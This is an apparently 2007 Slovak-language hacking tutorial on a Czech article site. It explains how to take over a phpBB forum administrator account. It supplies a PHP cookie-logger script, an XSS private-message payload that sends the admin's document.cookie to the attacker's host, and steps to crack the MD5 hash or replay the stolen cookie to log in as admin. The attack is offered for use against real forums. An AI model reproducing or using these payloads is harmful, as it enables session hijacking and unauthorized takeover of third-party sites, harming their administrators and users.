Zpět na seznam článků     Číst komentáře (29)     Verze pro tisk

Hacking phpbb fora

Autor: Neo13   
9.1.2007

Ako sa prihlasit na admina v phpbb pomocou odchytenia cookies...


Hacking phpBB
Po mensom "prekecani" z Emkei-om som sa rozhodol zverejnit svoj prvy clanok. Je to vlastne len preklad z inej stranky pre tych, ktory to nepoznaju, alebo nevedia how to (pre lamy ako som ja :D).


Na zaciatok budeme potrebovat:

Firefox (http://www.getfirefox.com)

Live HTTP Headers (http://livehttpheaders.mozdev.org/) - pre firefox

Nejaky free server s PHP (http://wz.cz)

1 - Urobime si subor v notepade

A vlozime donho tento kod, ktory nam zaruci, ze sa nam cookie ulozi:

< ?php

$cookie = $_GET['c'];

$ip = getenv ('REMOTE_ADDR');

$date=date("j F, Y, g:i a");

$referer=getenv ('HTTP_REFERER');

$fp = fopen('pwnt.txt', 'a'); //chmod 777

lol.txt

fwrite($fp,

'Cookie: '.$cookie.'

IP: ' .$ip. '

Date and Time: ' .$date. '

Referer: '.$referer.' ');

fclose($fp);

? >

Ulozime ho ako lol.php (alebo kao hocico .php) a uploadneme na nas free server.

2 - Najdeme si forum, ktore chceme hacknut (ak vidite, ze html je vypnute (ako na obrazku), radsej na to zabudnite, alebo rozmyslajte ako inak presvedcit admina aby siel na odkaz...) http://img167.imageshack.us/img167/2742/ohnoes9sp.th.jpg (http://img167.imageshack.us/my.php?image=ohnoes9sp.jpg)

3 - Toto je kod, ktory poslete adminovi ako sukromnu spravu, dopiste tam aj nieco co ho zaujme :)

< pre a='>' onmouseover='document.location="http://tvojadomena.wz.cz/lol.php?c="+document.cookie' b=' http://img485.imageshack.us/img485/4752/11403011905622mi5hj.jpg

Zmen tvojadomena na nazov tvojej domeny. Zmen obrazok na co len chcex,alebo ho vymaz. Zmen lol.php na nazor suboru, ktory sme vytvorili v kroku 1.

Ked admin prejde mysou na link presmeruje ho to na tvoj php subor a ukaze mu prazdnu obrazovku, Mozme to zmneit, elbo takto to nevyzera moc nenapadne.

4 - Teraz najdi admina fora, ktore chces hacknut a posli mu kod z bodu 3. Pockas kym si spravu pozrie (1 den,mozno viac).

5 - Ked prejde mysou na odkaz vytvori sa nam subor lol.txt (aj to sa da zmenit v bode 1), otvor ho.

Uvidis asi takyto kod:

Xforums_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:3:\"320\";}; admin=cXVpeGplc3RlcjozOTIxYzc1YjI5OTI2OGJkODdmNDhl YzhjMjg5YzNmMDplbmdsaXNo; user=MzIwOnViZXJtYWdlOjljZGZiNDM5Yzc4NzZlNzAzZTMwN zg2NGM5MTY3YTE1OjEwOjowOjA6MDowOjo0MDk2; lang=english; eqdkp_data=a:2:{s:13:\"auto_login_id\";s:32:\"3921c75b299268bd87f48ec8c289c3f0\";s:7:\"user_id\";s:1:\"1\";}; Xforums_sid=8e01ff74cfe643a527bdeafc9293a991

A - Najlahsie je skopirovat hash MD5 hesla ako tento: (bude zrejme iny, je to cookie...) 3921c75b299268bd87f48ec8c289c3f0 Skopiruj tento hash a chod na md5.rednoize.com alebo na iny cracker a vlep to tam, ak sa nic neukaze, budes musiet pouzit http headers (v priklade B) na zalogovanie sa ako admin.

B - Chod na forum, ktore si hackol, klikni na tools(Nástroje)(vo firefoxe) -> live http headers (dufam, ze uz mas firefox a http headers nainstalovane)

Teraz obnov stranku, na vrchu http headers obrazovky a uvidis nieco ako toto: http://img190.imageshack.us/img190/310/httpheaders6bg.th.jpg (http://img190.imageshack.us/my.php?image=httpheaders6bg.jpg)
Klikni na obnovit(refresh)
Vymaz cely kod, ktory prisiel potom cookie:
Vymen za kod, ktory sme dostali z bodu 5.
Zasa obnov stranku a si prihlaseny ako admin! Ak to nepodje na prvykrat, pohraj sa s headers, malo by sa to podarit.
Original najdete tu:
http://www.elitehackers.info/forums/showthread.php?t=2782
Dufam, ze ma neukamenujete, Neo13.


Líbil se Vám článek?
Budeme potěšeni, pokud vás zaujme také reklamní nabídka

Social Bookmarking

     





Hodnocení/Hlasovalo: 1.67/3

1  2  3  4  5    
(známkování jako ve škole)